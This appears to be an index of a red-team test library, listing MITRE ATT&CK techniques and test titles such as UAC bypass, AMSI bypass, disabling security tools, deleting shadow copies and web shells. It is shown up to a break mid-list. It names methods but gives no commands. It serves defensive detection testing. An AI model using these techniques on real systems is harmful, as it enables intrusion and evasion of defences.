- T1156 .bash_profile and .bashrc
- Atomic Test #1: Add command to .bash_profile [macos, linux]
- Atomic Test #2: Add command to .bashrc [macos, linux]
- T1015 Accessibility Features
- Atomic Test #1: Attaches Command Prompt As Debugger To Process - osk [windows]
- Atomic Test #2: Attaches Command Prompt As Debugger To Process - sethc [windows]
- Atomic Test #3: Attaches Command Prompt As Debugger To Process - utilman [windows]
- Atomic Test #4: Attaches Command Prompt As Debugger To Process - magnify [windows]
- Atomic Test #5: Attaches Command Prompt As Debugger To Process - narrator [windows]
- Atomic Test #6: Attaches Command Prompt As Debugger To Process - DisplaySwitch [windows]
- Atomic Test #7: Attaches Command Prompt As Debugger To Process - AtBroker [windows]
- T1098 Account Manipulation
- Atomic Test #1: Admin Account Manipulate [windows]
- T1182 AppCert DLLs CONTRIBUTE A TEST
- T1103 AppInit DLLs
- Atomic Test #1: Install AppInit Shim [windows]
- T1138 Application Shimming
- Atomic Test #1: Application Shim Installation [windows]
- Atomic Test #2: New shim database files created in the default shim database directory [windows]
- Atomic Test #3: Registry key creation and/or modification events for SDB [windows]
- T1131 Authentication Package CONTRIBUTE A TEST
- T1197 BITS Jobs
- Atomic Test #1: Download & Execute [windows]
- Atomic Test #2: Download & Execute via PowerShell BITS [windows]
- Atomic Test #3: Persist, Download, & Execute [windows]
- T1067 Bootkit CONTRIBUTE A TEST
- T1176 Browser Extensions
- Atomic Test #1: Chrome (Developer Mode) [linux, windows, macos]
- Atomic Test #2: Chrome (Chrome Web Store) [linux, windows, macos]
- Atomic Test #3: Firefox [linux, windows, macos]
- T1042 Change Default File Association
- Atomic Test #1: Change Default File Association [windows]
- T1109 Component Firmware CONTRIBUTE A TEST
- T1122 Component Object Model Hijacking
- Atomic Test #1: Component Object Model Hijacking [windows]
- T1136 Create Account
- Atomic Test #1: Create a user account on a Linux system [linux]
- Atomic Test #2: Create a user account on a MacOS system [macos]
- Atomic Test #3: Create a new user in a command prompt [windows]
- Atomic Test #4: Create a new user in PowerShell [windows]
- Atomic Test #5: Create a new user in Linux with
root
UID and GID. [linux]
- T1038 DLL Search Order Hijacking
- Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows]
- T1157 Dylib Hijacking CONTRIBUTE A TEST
- T1519 Emond
- Atomic Test #1: Persistance with Event Monitor - emond [macos]
- T1133 External Remote Services CONTRIBUTE A TEST
- T1044 File System Permissions Weakness
- Atomic Test #1: File System Permissions Weakness [windows]
- T1158 Hidden Files and Directories
- Atomic Test #1: Create a hidden file in a hidden directory [linux, macos]
- Atomic Test #2: Mac Hidden file [macos]
- Atomic Test #3: Create Windows System File with Attrib [windows]
- Atomic Test #4: Create Windows Hidden File with Attrib [windows]
- Atomic Test #5: Hidden files [macos]
- Atomic Test #6: Hide a Directory [macos]
- Atomic Test #7: Show all hidden files [macos]
- Atomic Test #8: Create ADS command prompt [windows]
- Atomic Test #9: Create ADS PowerShell [windows]
- T1179 Hooking
- Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows]
- T1062 Hypervisor
- Atomic Test #1: Installing Hyper-V Feature [windows]
- T1183 Image File Execution Options Injection
- Atomic Test #1: IFEO Add Debugger [windows]
- Atomic Test #2: IFEO Global Flags [windows]
- T1525 Implant Container Image CONTRIBUTE A TEST
- T1215 Kernel Modules and Extensions
- Atomic Test #1: Linux - Load Kernel Module via insmod [linux]
- T1161 LC_LOAD_DYLIB Addition CONTRIBUTE A TEST
- T1177 LSASS Driver CONTRIBUTE A TEST
- T1159 Launch Agent
- Atomic Test #1: Launch Agent [macos]
- T1160 Launch Daemon
- Atomic Test #1: Launch Daemon [macos]
- T1152 Launchctl
- Atomic Test #1: Launchctl [macos]
- T1168 Local Job Scheduling
- Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux]
- Atomic Test #2: Cron - Add script to cron folder [macos, linux]
- Atomic Test #3: Event Monitor Daemon Persistence [macos, linux]
- T1162 Login Item CONTRIBUTE A TEST
- T1037 Logon Scripts
- Atomic Test #1: Logon Scripts [windows]
- Atomic Test #2: Startup Folder Script [windows]
- Atomic Test #3: Scheduled Task Startup Script [windows]
- Atomic Test #4: Logon Scripts - Mac [macos]
- T1031 Modify Existing Service
- Atomic Test #1: Modify Fax service to run PowerShell [windows]
- T1128 Netsh Helper DLL
- Atomic Test #1: Netsh Helper DLL Registration [windows]
- T1050 New Service
- Atomic Test #1: Service Installation [windows]
- Atomic Test #2: Service Installation PowerShell Installs A Local Service using PowerShell [windows]
- T1137 Office Application Startup
- Atomic Test #1: DDEAUTO [windows]
- T1034 Path Interception CONTRIBUTE A TEST
- T1150 Plist Modification
- Atomic Test #1: Plist Modification [macos]
- T1205 Port Knocking CONTRIBUTE A TEST
- T1013 Port Monitors CONTRIBUTE A TEST
- T1504 PowerShell Profile
- Atomic Test #1: Append malicious start-process cmdlet [windows]
- T1163 Rc.common
- Atomic Test #1: rc.common [macos]
- T1164 Re-opened Applications
- Atomic Test #1: Re-Opened Applications [macos]
- Atomic Test #2: Re-Opened Applications [macos]
- T1108 Redundant Access CONTRIBUTE A TEST
- T1060 Registry Run Keys / Startup Folder
- Atomic Test #1: Reg Key Run [windows]
- Atomic Test #2: Reg Key RunOnce [windows]
- Atomic Test #3: PowerShell Registry RunOnce [windows]
- T1198 SIP and Trust Provider Hijacking CONTRIBUTE A TEST
- T1053 Scheduled Task
- Atomic Test #1: At.exe Scheduled task [windows]
- Atomic Test #2: Scheduled task Local [windows]
- Atomic Test #3: Scheduled task Remote [windows]
- Atomic Test #4: Powershell Cmdlet Scheduled Task [windows]
- T1180 Screensaver
- Atomic Test #1: Set Arbitrary Binary as Screensaver [windows]
- T1101 Security Support Provider
- Atomic Test #1: Modify SSP configuration in registry [windows]
- T1505 Server Software Component
- Atomic Test #1: Install MS Exchange Transport Agent Persistence [windows]
- T1058 Service Registry Permissions Weakness
- Atomic Test #1: Service Registry Permissions Weakness [windows]
- T1166 Setuid and Setgid
- Atomic Test #1: Make and modify binary from C source [macos, linux]
- Atomic Test #2: Set a SetUID flag on file [macos, linux]
- Atomic Test #3: Set a SetGID flag on file [macos, linux]
- T1023 Shortcut Modification
- Atomic Test #1: Shortcut Modification [windows]
- Atomic Test #2: Create shortcut to cmd in startup folders [windows]
- T1165 Startup Items
- Atomic Test #1: add file to Local Library StartupItems [macos]
- T1019 System Firmware CONTRIBUTE A TEST
- T1501 Systemd Service
- Atomic Test #1: Create Systemd Service [linux]
- T1209 Time Providers CONTRIBUTE A TEST
- T1154 Trap
- Atomic Test #1: Trap [macos, linux]
- T1078 Valid Accounts CONTRIBUTE A TEST
- T1100 Web Shell
- Atomic Test #1: Web Shell Written to Disk [windows]
- T1084 Windows Management Instrumentation Event Subscription
- Atomic Test #1: Persistence [windows]
- T1004 Winlogon Helper DLL
- Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows]
- Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows]
- Atomic Test #3: Winlogon Notify Key Logon Persistence - PowerShell [windows]
- T1134 Access Token Manipulation
- Atomic Test #1: Access Token Manipulation [windows]
- T1527 Application Access Token CONTRIBUTE A TEST
- T1197 BITS Jobs
- Atomic Test #1: Download & Execute [windows]
- Atomic Test #2: Download & Execute via PowerShell BITS [windows]
- Atomic Test #3: Persist, Download, & Execute [windows]
- T1009 Binary Padding
- Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [macos, linux]
- T1088 Bypass User Account Control
- Atomic Test #1: Bypass UAC using Event Viewer [windows]
- Atomic Test #2: Bypass UAC using Event Viewer - PowerShell [windows]
- Atomic Test #3: Bypass UAC using Fodhelper [windows]
- Atomic Test #4: Bypass UAC using Fodhelper - PowerShell [windows]
- Atomic Test #5: Bypass UAC using ComputerDefaults - PowerShell [windows]
- Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
- T1191 CMSTP
- Atomic Test #1: CMSTP Executing Remote Scriptlet [windows]
- Atomic Test #2: CMSTP Executing UAC Bypass [windows]
- T1146 Clear Command History
- Atomic Test #1: Clear Bash history (rm) [linux, macos]
- Atomic Test #2: Clear Bash history (echo) [linux, macos]
- Atomic Test #3: Clear Bash history (cat dev/null) [linux, macos]
- Atomic Test #4: Clear Bash history (ln dev/null) [linux, macos]
- Atomic Test #5: Clear Bash history (truncate) [linux]
- Atomic Test #6: Clear history of a bunch of shells [linux, macos]
- T1116 Code Signing CONTRIBUTE A TEST
- T1500 Compile After Delivery
- Atomic Test #1: Compile After Delivery using csc.exe [windows]
- T1223 Compiled HTML File
- Atomic Test #1: Compiled HTML Help Local Payload [windows]
- Atomic Test #2: Compiled HTML Help Remote Payload [windows]
- T1109 Component Firmware CONTRIBUTE A TEST
- T1122 Component Object Model Hijacking
- Atomic Test #1: Component Object Model Hijacking [windows]
- T1090 Connection Proxy
- Atomic Test #1: Connection Proxy [macos, linux]
- Atomic Test #2: portproxy reg key [windows]
- T1196 Control Panel Items
- Atomic Test #1: Control Panel Items [windows]
- T1207 DCShadow
- Atomic Test #1: DCShadow - Mimikatz [windows]
- T1038 DLL Search Order Hijacking
- Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows]
- T1073 DLL Side-Loading
- Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
- T1140 Deobfuscate/Decode Files or Information
- Atomic Test #1: Deobfuscate/Decode Files Or Information [windows]
- Atomic Test #2: Certutil Rename and Decode [windows]
- T1089 Disabling Security Tools
- Atomic Test #1: Disable iptables firewall [linux]
- Atomic Test #2: Disable syslog [linux]
- Atomic Test #3: Disable Cb Response [linux]
- Atomic Test #4: Disable SELinux [linux]
- Atomic Test #5: Disable Carbon Black Response [macos]
- Atomic Test #6: Disable LittleSnitch [macos]
- Atomic Test #7: Disable OpenDNS Umbrella [macos]
- Atomic Test #8: Unload Sysmon Filter Driver [windows]
- Atomic Test #9: Disable Windows IIS HTTP Logging [windows]
- Atomic Test #10: Uninstall Sysmon [windows]
- Atomic Test #11: AMSI Bypass - AMSI InitFailed [windows]
- Atomic Test #12: AMSI Bypass - Remove AMSI Provider Reg Key [windows]
- Atomic Test #13: Disable Arbitrary Security Windows Service [windows]
- Atomic Test #14: Disable PowerShell Script Block Logging [windows]
- Atomic Test #15: PowerShell Bypass of AntiMalware Scripting Interface [windows]
- Atomic Test #16: Tamper with Windows Defender ATP PowerShell [windows]
- Atomic Test #17: Tamper with Windows Defender Command Prompt [windows]
- Atomic Test #18: Tamper with Windows Defender Registry [windows]
- T1480 Execution Guardrails CONTRIBUTE A TEST
- T1211 Exploitation for Defense Evasion CONTRIBUTE A TEST
- T1181 Extra Window Memory Injection CONTRIBUTE A TEST
- T1107 File Deletion
- Atomic Test #1: Delete a single file - Linux/macOS [linux, macos]
- Atomic Test #2: Delete an entire folder - Linux/macOS [linux, macos]
- Atomic Test #3: Overwrite and delete a file with shred [linux]
- Atomic Test #4: Delete a single file - Windows cmd [windows]
- Atomic Test #5: Delete an entire folder - Windows cmd [windows]
- Atomic Test #6: Delete a single file - Windows PowerShell [windows]
- Atomic Test #7: Delete an entire folder - Windows PowerShell [windows]
- Atomic Test #8: Delete VSS - vssadmin [windows]
- Atomic Test #9: Delete VSS - wmic [windows]
- Atomic Test #10: bcdedit [windows]
- Atomic Test #11: wbadmin [windows]
- Atomic Test #12: Delete Filesystem - Linux [linux]
- Atomic Test #13: Delete-PrefetchFile [windows]
- T1006 File System Logical Offsets
- Atomic Test #1: File System Logical Offsets using PowerShell [windows]
- T1222 File and Directory Permissions Modification
- Atomic Test #1: Take ownership using takeown utility [windows]
- Atomic Test #2: Take ownership recursively using takeown utility [windows]
- Atomic Test #3: cacls - Grant permission to specified user or group [windows]
- Atomic Test #4: cacls - Grant permission to specified user or group recursively [windows]
- Atomic Test #5: icacls - Grant permission to specified user or group [windows]
- Atomic Test #6: icacls - Grant permission to specified user or group recursively [windows]
- Atomic Test #7: attrib - Remove read-only attribute [windows]
- Atomic Test #8: chmod - Change file or folder mode (numeric mode) [macos, linux]
- Atomic Test #9: chmod - Change file or folder mode (symbolic mode) [macos, linux]
- Atomic Test #10: chmod - Change file or folder mode (numeric mode) recursively [macos, linux]
- Atomic Test #11: chmod - Change file or folder mode (symbolic mode) recursively [macos, linux]
- Atomic Test #12: chown - Change file or folder ownership and group [macos, linux]
- Atomic Test #13: chown - Change file or folder ownership and group recursively [macos, linux]
- Atomic Test #14: chown - Change file or folder mode ownership only [macos, linux]
- Atomic Test #15: chown - Change file or folder ownership recursively [macos, linux]
- Atomic Test #16: chattr - Remove immutable file attribute [macos, linux]
- T1144 Gatekeeper Bypass
- Atomic Test #1: Gatekeeper Bypass [macos]
- T1484 Group Policy Modification CONTRIBUTE A TEST
- T1148 HISTCONTROL
- Atomic Test #1: Disable history collection [linux, macos]
- Atomic Test #2: Mac HISTCONTROL [macos, linux]
- T1158 Hidden Files and Directories
- Atomic Test #1: Create a hidden file in a hidden directory [linux, macos]
- Atomic Test #2: Mac Hidden file [macos]
- Atomic Test #3: Create Windows System File with Attrib [windows]
- Atomic Test #4: Create Windows Hidden File with Attrib [windows]
- Atomic Test #5: Hidden files [macos]
- Atomic Test #6: Hide a Directory [macos]
- Atomic Test #7: Show all hidden files [macos]
- Atomic Test #8: Create ADS command prompt [windows]
- Atomic Test #9: Create ADS PowerShell [windows]
- T1147 Hidden Users
- Atomic Test #1: Hidden Users [macos]
- T1143 Hidden Window
- Atomic Test #1: Hidden Window [windows]
- T1183 Image File Execution Options Injection
- Atomic Test #1: IFEO Add Debugger [windows]
- Atomic Test #2: IFEO Global Flags [windows]
- T1054 Indicator Blocking CONTRIBUTE A TEST
- T1066 Indicator Removal from Tools CONTRIBUTE A TEST
- T1070 Indicator Removal on Host
- Atomic Test #1: Clear Logs [windows]
- Atomic Test #2: FSUtil [windows]
- Atomic Test #3: rm -rf [macos, linux]
- Atomic Test #4: Overwrite Linux Mail Spool [linux]
- Atomic Test #5: Overwrite Linux Log [linux]
- Atomic Test #6: Delete System Logs Using PowerShell [windows]
- Atomic Test #7: Delete System Logs Using Clear-EventLogId [windows]
- T1202 Indirect Command Execution
- Atomic Test #1: Indirect Command Execution - pcalua.exe [windows]
- Atomic Test #2: Indirect Command Execution - forfiles.exe [windows]
- T1130 Install Root Certificate
- Atomic Test #1: Install root CA on CentOS/RHEL [linux]
- T1118 InstallUtil
- Atomic Test #1: InstallUtil uninstall method call [windows]
- Atomic Test #2: InstallUtil GetHelp method call [windows]
- T1149 LC_MAIN Hijacking CONTRIBUTE A TEST
- T1152 Launchctl
- Atomic Test #1: Launchctl [macos]
- T1036 Masquerading
- Atomic Test #1: Masquerading as Windows LSASS process [windows]
- Atomic Test #2: Masquerading as Linux crond process. [linux]
- Atomic Test #3: Masquerading - cscript.exe running as notepad.exe [windows]
- Atomic Test #4: Masquerading - wscript.exe running as svchost.exe [windows]
- Atomic Test #5: Masquerading - powershell.exe running as taskhostw.exe [windows]
- Atomic Test #6: Masquerading - non-windows exe running as windows exe [windows]
- Atomic Test #7: Masquerading - windows exe running as different windows exe [windows]
- Atomic Test #8: Malicious process Masquerading as LSM.exe [windows]
- T1112 Modify Registry
- Atomic Test #1: Modify Registry of Current User Profile - cmd [windows]
- Atomic Test #2: Modify Registry of Local Machine - cmd [windows]
- Atomic Test #3: Modify Registry of Another User Profile [windows]
- Atomic Test #4: Modify registry to store logon credentials [windows]
- Atomic Test #5: Modify registry to store PowerShell code [windows]
- Atomic Test #6: Add domain to Trusted sites Zone [windows]
- T1170 Mshta
- Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
- Atomic Test #2: Mshta calls a local VBScript file to launch notepad.exe [windows]
- Atomic Test #3: Mshta executes VBScript to execute malicious command [windows]
- Atomic Test #4: Mshta Executes Remote HTML Application (HTA) [windows]
- T1096 NTFS File Attributes
- Atomic Test #1: Alternate Data Streams (ADS) [windows]
- Atomic Test #2: Store file in Alternate Data Stream (ADS) [windows]
- T1126 Network Share Connection Removal
- Atomic Test #1: Add Network Share [windows]
- Atomic Test #2: Remove Network Share [windows]
- Atomic Test #3: Remove Network Share PowerShell [windows]
- T1027 Obfuscated Files or Information
- Atomic Test #1: Decode base64 Data into Script [macos, linux]
- Atomic Test #2: Execute base64-encoded PowerShell [windows]
- Atomic Test #3: Execute base64-encoded PowerShell from Windows Registry [windows]
- T1502 Parent PID Spoofing
- Atomic Test #1: Parent PID Spoofing using PowerShell [windows]
- T1150 Plist Modification
- Atomic Test #1: Plist Modification [macos]
- T1205 Port Knocking CONTRIBUTE A TEST
- T1186 Process Doppelgänging CONTRIBUTE A TEST
- T1093 Process Hollowing
- Atomic Test #1: Process Hollowing using PowerShell [windows]
- T1055 Process Injection
- Atomic Test #1: Process Injection via mavinject.exe [windows]
- Atomic Test #2: Process Injection via PowerSploit [windows]
- Atomic Test #3: Shared Library Injection via /etc/ld.so.preload [linux]
- Atomic Test #4: Shared Library Injection via LD_PRELOAD [linux]
- Atomic Test #5: Process Injection via C# [windows]
- Atomic Test #6: svchost writing a file to a UNC path [windows]
- T1108 Redundant Access CONTRIBUTE A TEST
- T1121 Regsvcs/Regasm
- Atomic Test #1: Regasm Uninstall Method Call Test [windows]
- Atomic Test #2: Regsvs Uninstall Method Call Test [windows]
- T1117 Regsvr32
- Atomic Test #1: Regsvr32 local COM scriptlet execution [windows]
- Atomic Test #2: Regsvr32 remote COM scriptlet execution [windows]
- Atomic Test #3: Regsvr32 local DLL execution [windows]
- T1536 Revert Cloud Instance CONTRIBUTE A TEST
- T1014 Rootkit
- Atomic Test #1: Loadable Kernel Module based Rootkit [linux]
- Atomic Test #2: Loadable Kernel Module based Rootkit [linux]
- Atomic Test #3: Windows Signed Driver Rootkit Test [windows]
- T1085 Rundll32
- Atomic Test #1: Rundll32 execute JavaScript Remote Payload With GetObject [windows]
- Atomic Test #2: Rundll32 execute VBscript command [windows]
- Atomic Test #3: Rundll32 advpack.dll Execution [windows]
- Atomic Test #4: Rundll32 ieadvpack.dll Execution [windows]
- Atomic Test #5: Rundll32 syssetup.dll Execution [windows]
- Atomic Test #6: Rundll32 setupapi.dll Execution [windows]
- T1198 SIP and Trust Provider Hijacking CONTRIBUTE A TEST
- T1064 Scripting
- Atomic Test #1: Create and Execute Bash Shell Script [macos, linux]
- Atomic Test #2: Create and Execute Batch Script [windows]
- T1218 Signed Binary Proxy Execution
- Atomic Test #1: mavinject - Inject DLL into running process [windows]
- Atomic Test #2: SyncAppvPublishingServer - Execute arbitrary PowerShell code [windows]
- Atomic Test #3: Register-CimProvider - Execute evil dll [windows]
- Atomic Test #4: Msiexec.exe - Execute Local MSI file [windows]
- Atomic Test #5: Msiexec.exe - Execute Remote MSI file [windows]
- Atomic Test #6: Msiexec.exe - Execute Arbitrary DLL [windows]
- Atomic Test #7: Odbcconf.exe - Execute Arbitrary DLL [windows]
- Atomic Test #8: InfDefaultInstall.exe .inf Execution [windows]
- T1216 Signed Script Proxy Execution
- Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows]
- Atomic Test #2: SyncAppvPublishingServe Signed Script PowerShell Command Execution [windows]
- Atomic Test #3: manage-bde.wsf Signed Script Command Execution [windows]
- T1045 Software Packing CONTRIBUTE A TEST
- T1151 Space after Filename
- Atomic Test #1: Space After Filename [macos]
- T1221 Template Injection CONTRIBUTE A TEST
- T1099 Timestomp
- Atomic Test #1: Set a file's access timestamp [linux, macos]
- Atomic Test #2: Set a file's modification timestamp [linux, macos]
- Atomic Test #3: Set a file's creation timestamp [linux, macos]
- Atomic Test #4: Modify file timestamps using reference file [linux, macos]
- Atomic Test #5: Windows - Modify file creation timestamp with PowerShell [windows]
- Atomic Test #6: Windows - Modify file last modified timestamp with PowerShell [windows]
- Atomic Test #7: Windows - Modify file last access timestamp with PowerShell [windows]
- T1127 Trusted Developer Utilities
- Atomic Test #1: MSBuild Bypass Using Inline Tasks [windows]
- T1535 Unused/Unsupported Cloud Regions CONTRIBUTE A TEST
- T1078 Valid Accounts CONTRIBUTE A TEST
- T1497 Virtualization/Sandbox Evasion CONTRIBUTE A TEST
- T1102 Web Service
- Atomic Test #1: Reach out to C2 Pointer URLs via command_prompt [windows]
- Atomic Test #2: Reach out to C2 Pointer URLs via powershell [windows]
- T1506 Web Session Cookie CONTRIBUTE A TEST
- T1220 XSL Script Processing
- Atomic Test #1: MSXSL Bypass using local files [windows]
- Atomic Test #2: MSXSL Bypass using remote files [windows]
- Atomic Test #3: WMIC bypass using local XSL file [windows]
- Atomic Test #4: WMIC bypass using remote XSL file [windows]
- T1134 Access Token Manipulation
- Atomic Test #1: Access Token Manipulation [windows]
- T1015 Accessibility Features
- Atomic Test #1: Attaches Command Prompt As Debugger To Process - osk [windows]
- Atomic Test #2: Attaches Command Prompt As Debugger To Process - sethc [windows]
- Atomic Test #3: Attaches Command Prompt As Debugger To Process - utilman [windows]
- Atomic Test #4: Attaches Command Prompt As Debugger To Process - magnify [windows]
- Atomic Test #5: Attaches Command Prompt As Debugger To Process - narrator [windows]
- Atomic Test #6: Attaches Command Prompt As Debugger To Process - DisplaySwitch [windows]
- Atomic Test #7: Attaches Command Prompt As Debugger To Process - AtBroker [windows]
- T1182 AppCert DLLs CONTRIBUTE A TEST
- T1103 AppInit DLLs
- Atomic Test #1: Install AppInit Shim [windows]
- T1138 Application Shimming
- Atomic Test #1: Application Shim Installation [windows]
- Atomic Test #2: New shim database files created in the default shim database directory [windows]
- Atomic Test #3: Registry key creation and/or modification events for SDB [windows]
- T1088 Bypass User Account Control
- Atomic Test #1: Bypass UAC using Event Viewer [windows]
- Atomic Test #2: Bypass UAC using Event Viewer - PowerShell [windows]
- Atomic Test #3: Bypass UAC using Fodhelper [windows]
- Atomic Test #4: Bypass UAC using Fodhelper - PowerShell [windows]
- Atomic Test #5: Bypass UAC using ComputerDefaults - PowerShell [windows]
- Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
- T1038 DLL Search Order Hijacking
- Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows]
- T1157 Dylib Hijacking CONTRIBUTE A TEST
- T1514 Elevated Execution with Prompt CONTRIBUTE A TEST
- T1519 Emond
- Atomic Test #1: Persistance with Event Monitor - emond [macos]
- T1068 Exploitation for Privilege Escalation CONTRIBUTE A TEST
- T1181 Extra Window Memory Injection CONTRIBUTE A TEST
- T1044 File System Permissions Weakness
- Atomic Test #1: File System Permissions Weakness [windows]
- T1179 Hooking
- Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows]
- T1183 Image File Execution Options Injection
- Atomic Test #1: IFEO Add Debugger [windows]
- Atomic Test #2: IFEO Global Flags [windows]
- T1160 Launch Daemon
- Atomic Test #1: Launch Daemon [macos]
- T1050 New Service
- Atomic Test #1: Service Installation [windows]
- Atomic Test #2: Service Installation PowerShell Installs A Local Service using PowerShell [windows]
- T1502 Parent PID Spoofing
- Atomic Test #1: Parent PID Spoofing using PowerShell [windows]
- T1034 Path Interception CONTRIBUTE A TEST
- T1150 Plist Modification
- Atomic Test #1: Plist Modification [macos]
- T1013 Port Monitors CONTRIBUTE A TEST
- T1504 PowerShell Profile
- Atomic Test #1: Append malicious start-process cmdlet [windows]
- T1055 Process Injection
- Atomic Test #1: Process Injection via mavinject.exe [windows]
- Atomic Test #2: Process Injection via PowerSploit [windows]
- Atomic Test #3: Shared Library Injection via /etc/ld.so.preload [linux]
- Atomic Test #4: Shared Library Injection via LD_PRELOAD [linux]
- Atomic Test #5: Process Injection via C# [windows]
- Atomic Test #6: svchost writing a file to a UNC path [windows]
- T1178 SID-History Injection CONTRIBUTE A TEST
- T1053 Scheduled Task
- Atomic Test #1: At.exe Scheduled task [windows]
- Atomic Test #2: Scheduled task Local [windows]
- Atomic Test #3: Scheduled task Remote [windows]
- Atomic Test #4: Powershell Cmdlet Scheduled Task [windows]
- T1058 Service Registry Permissions Weakness
- Atomic Test #1: Service Registry Permissions Weakness [windows]
- T1166 Setuid and Setgid
- Atomic Test #1: Make and modify binary from C source [macos, linux]
- Atomic Test #2: Set a SetUID flag on file [macos, linux]
- Atomic Test #3: Set a SetGID flag on file [macos, linux]
- T1165 Startup Items
- Atomic Test #1: add file to Local Library StartupItems [macos]
- T1169 Sudo
- Atomic Test #1: Sudo usage [macos, linux]
- T1206 Sudo Caching
- Atomic Test #1: Unlimited sudo cache timeout [macos, linux]
- Atomic Test #2: Disable tty_tickets for sudo caching [macos, linux]
- T1078 Valid Accounts CONTRIBUTE A TEST
- T1100 Web Shell
- Atomic Test #1: Web Shell Written to Disk [windows]
- T1531 Account Access Removal
- Atomic Test #1: Change User Password - Windows [windows]
- Atomic Test #2: Delete User - Windows [windows]
- T1485 Data Destruction
- Atomic Test #1: Windows - Delete Volume Shadow Copies [windows]
- Atomic Test #2: Windows - Delete Windows Backup Catalog [windows]
- Atomic Test #3: Windows - Disable Windows Recovery Console Repair [windows]
- Atomic Test #4: Windows - Overwrite file with Sysinternals SDelete [windows]
- Atomic Test #5: macOS/Linux - Overwrite file with DD [linux, macos]
- Atomic Test #6: Windows - Delete Backup Files [windows]
- T1486 Data Encrypted for Impact CONTRIBUTE A TEST
- T1491 Defacement CONTRIBUTE A TEST
- T1488 Disk Content Wipe CONTRIBUTE A TEST
- T1487 Disk Structure Wipe CONTRIBUTE A TEST
- T1499 Endpoint Denial of Service CONTRIBUTE A TEST
- T1495 Firmware Corruption CONTRIBUTE A TEST
- T1490 Inhibit System Recovery
- Atomic Test #1: Windows - Delete Volume Shadow Copies [windows]
- Atomic Test #2: Windows - Delete Volume Shadow Copies via WMI [windows]
- Atomic Test #3: Windows - Delete Windows Backup Catalog [windows]
- Atomic Test #4: Windows - Disable Windows Recovery Console Repair [windows]
- Atomic Test #5: Windows - Delete Volume Shadow Copies via WMI with PowerShell [windows]
- T1498 Network Denial of Service CONTRIBUTE A TEST
- T1496 Resource Hijacking
- Atomic Test #1: macOS/Linux - Simulate CPU Load with Yes [macos, linux]
- T1494 Runtime Data Manipulation CONTRIBUTE A TEST
- T1489 Service Stop
- Atomic Test #1: Windows - Stop service using Service Controller [windows]
- Atomic Test #2: Windows - Stop service using net.exe [windows]
- Atomic Test #3: Windows - Stop service by killing process [windows]
- T1492 Stored Data Manipulation CONTRIBUTE A TEST
- T1529 System Shutdown/Reboot
- Atomic Test #1: Shutdown System - Windows [windows]
- Atomic Test #2: Restart System - Windows [windows]
- Atomic Test #3: Restart System via
shutdown
- macOS/Linux [macos, linux] - Atomic Test #4: Shutdown System via
shutdown
- macOS/Linux [macos, linux] - Atomic Test #5: Restart System via
reboot
- macOS/Linux [macos, linux] - Atomic Test #6: Shutdown System via
halt
- Linux [linux] - Atomic Test #7: Reboot System via
halt
- Linux [linux] - Atomic Test #8: Shutdown System via
poweroff
- Linux [linux] - Atomic Test #9: Reboot System via
poweroff
- Linux [linux]
- T1493 Transmitted Data Manipulation CONTRIBUTE A TEST
- T1087 Account Discovery
- Atomic Test #1: Enumerate all accounts [linux, macos]
- Atomic Test #2: View sudoers access [linux, macos]
- Atomic Test #3: View accounts with UID 0 [linux, macos]
- Atomic Test #4: List opened files by user [linux, macos]
- Atomic Test #5: Show if a user account has ever logger in remotely [linux, macos]
- Atomic Test #6: Enumerate users and groups [linux, macos]
- Atomic Test #7: Enumerate users and groups [macos]
- Atomic Test #8: Enumerate all accounts [windows]
- Atomic Test #9: Enumerate all accounts via PowerShell [windows]
- Atomic Test #10: Enumerate logged on users [windows]
- Atomic Test #11: Enumerate logged on users via PowerShell [windows]
- T1010 Application Window Discovery
- Atomic Test #1: List Process Main Windows - C# .NET [windows]
- T1217 Browser Bookmark Discovery
- Atomic Test #1: List Mozilla Firefox Bookmark Database Files on Linux [linux]
- Atomic Test #2: List Mozilla Firefox Bookmark Database Files on macOS [macos]
- Atomic Test #3: List Google Chrome Bookmark JSON Files on macOS [macos]
- Atomic Test #4: List Google Chrome Bookmarks on Windows with powershell [windows]
- Atomic Test #5: List Google Chrome Bookmarks on Windows with command prompt [windows]
- T1538 Cloud Service Dashboard CONTRIBUTE A TEST
- T1526 Cloud Service Discovery CONTRIBUTE A TEST
- T1482 Domain Trust Discovery
- Atomic Test #1: Windows - Discover domain trusts with dsquery [windows]
- Atomic Test #2: Windows - Discover domain trusts with nltest [windows]
- Atomic Test #3: Powershell enumerate domains and forests [windows]
- T1083 File and Directory Discovery
- Atomic Test #1: File and Directory Discovery [windows]
- Atomic Test #2: File and Directory Discovery [windows]
- Atomic Test #3: Nix File and Diectory Discovery [macos, linux]
- Atomic Test #4: Nix File and Directory Discovery [macos, linux]
- T1046 Network Service Scanning
- Atomic Test #1: Port Scan [linux, macos]
- Atomic Test #2: Port Scan Nmap [linux, macos]
- T1135 Network Share Discovery
- Atomic Test #1: Network Share Discovery [macos, linux]
- Atomic Test #2: Network Share Discovery command prompt [windows]
- Atomic Test #3: Network Share Discovery PowerShell [windows]
- Atomic Test #4: View available share drives [windows]
- T1040 Network Sniffing
- Atomic Test #1: Packet Capture Linux [linux]
- Atomic Test #2: Packet Capture MacOS [macos]
- Atomic Test #3: Packet Capture Windows Command Prompt [windows]
- Atomic Test #4: Packet Capture PowerShell [windows]
- T1201 Password Policy Discovery
- Atomic Test #1: Examine password complexity policy - Ubuntu [linux]
- Atomic Test #2: Examine password complexity policy - CentOS/RHEL 7.x [linux]
- Atomic Test #3: Examine password complexity policy - CentOS/RHEL 6.x [linux]
- Atomic Test #4: Examine password expiration policy - All Linux [linux]
- Atomic Test #5: Examine local password policy - Windows [windows]
- Atomic Test #6: Examine domain password policy - Windows [windows]
- Atomic Test #7: Examine password policy - macOS [macos]
- T1120 Peripheral Device Discovery CONTRIBUTE A TEST
- T1069 Permission Groups Discovery
